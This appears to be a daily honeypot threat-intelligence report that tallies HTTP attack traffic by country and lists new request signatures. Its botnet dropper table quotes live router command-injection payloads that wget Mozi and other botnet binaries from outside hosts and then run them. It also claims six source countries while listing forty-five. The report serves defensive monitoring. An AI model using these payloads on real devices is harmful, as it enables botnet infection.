Daily Report: 2025-06-10#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 6 stage 1 IP address(es), linked to 5 dropper URL(s).
There are 6 new requests that have never been observed before (these were added to the monitored request database.).
A total of 984 requests were recorded during the day, originating from 6 different countries, with a peak of 226 requests coming from US.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
KR | Germany |
FR | Dubai |
US | Dubai |
botnet_dropper_behaviour#
remote_addr | request |
---|---|
45.230.66.2 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://45.230.66.2:10582/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
176.65.148.236 | POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20fghe3tj.arm7%3B%20wget%20http%3A%2F%2F209.141.39.243%2F010100110101010%2Ffghe3tj.arm7%3B%20chmod%20777%20fghe3tj.arm7%3B%20.%2Ffghe3tj.arm7%20router HTTP/1.1 |
77.239.213.209 | GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 |
87.121.84.34 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://31.59.40.187/x/tplink+-O- |
195.3.221.137 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://31.59.40.187/x/tplink+-O- |
141.98.11.147 | GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/x86;chmod+777+;./x86+x86;cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/arm7;chmod+777+;./arm7+arm7;cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/arm4;chmod+777+;./arm4+arm4;cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/arm5;chmod+777+;./arm5+arm5 HTTP/1.1 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
number_of_occurence | request | |
---|---|---|
45 | 3 | JDWP-Handshake |
152 | 1 | \x00\x0E8i\xE9\xEF)\xC4\xF3 |
159 | 1 | \x00\x0E8\x81?\x1AT\x15\xD8\xC4E\x00\x00\x00\x00\x00 |
210 | 1 | \x00\x0E8\x8A\x1C\xDC\xD5\xEAk\xBB\xDB\x00\x00\x00\x00\x00 |
229 | 1 | GET /socket.io/1/?t=1749516403273 HTTP/1.1 |
268 | 1 | \x00\x0E8\xED\xAF\xE6\x8DZdZ\x9D\x00\x00\x00\x00\x00 |
country_iso_code#
number_of_occurence | country_iso_code | |
---|---|---|
0 | 226 | US |
1 | 109 | BG |
2 | 97 | DE |
3 | 75 | NL |
4 | 73 | IN |
5 | 60 | JP |
6 | 54 | LT |
7 | 42 | AU |
8 | 34 | CA |
9 | 33 | FR |
10 | 32 | HK |
11 | 25 | PL |
12 | 17 | NG |
13 | 13 | SC |
14 | 10 | SG |
15 | 9 | HU |
16 | 7 | GB |
17 | 7 | KR |
18 | 6 | IL |
19 | 6 | ZA |
20 | 6 | CN |
21 | 4 | BE |
22 | 3 | RU |
23 | 3 | IR |
24 | 3 | PT |
25 | 3 | CH |
26 | 3 | KZ |
27 | 2 | ES |
28 | 2 | BD |
29 | 2 | AO |
30 | 2 | KW |
31 | 2 | IE |
32 | 2 | AE |
33 | 1 | BR |
34 | 1 | TR |
35 | 1 | MX |
36 | 1 | GH |
37 | 1 | AR |
38 | 1 | IT |
39 | 1 | ID |
40 | 1 | TW |
41 | 1 | SE |
42 | 1 | PA |
43 | 1 | PE |
44 | 1 | UA |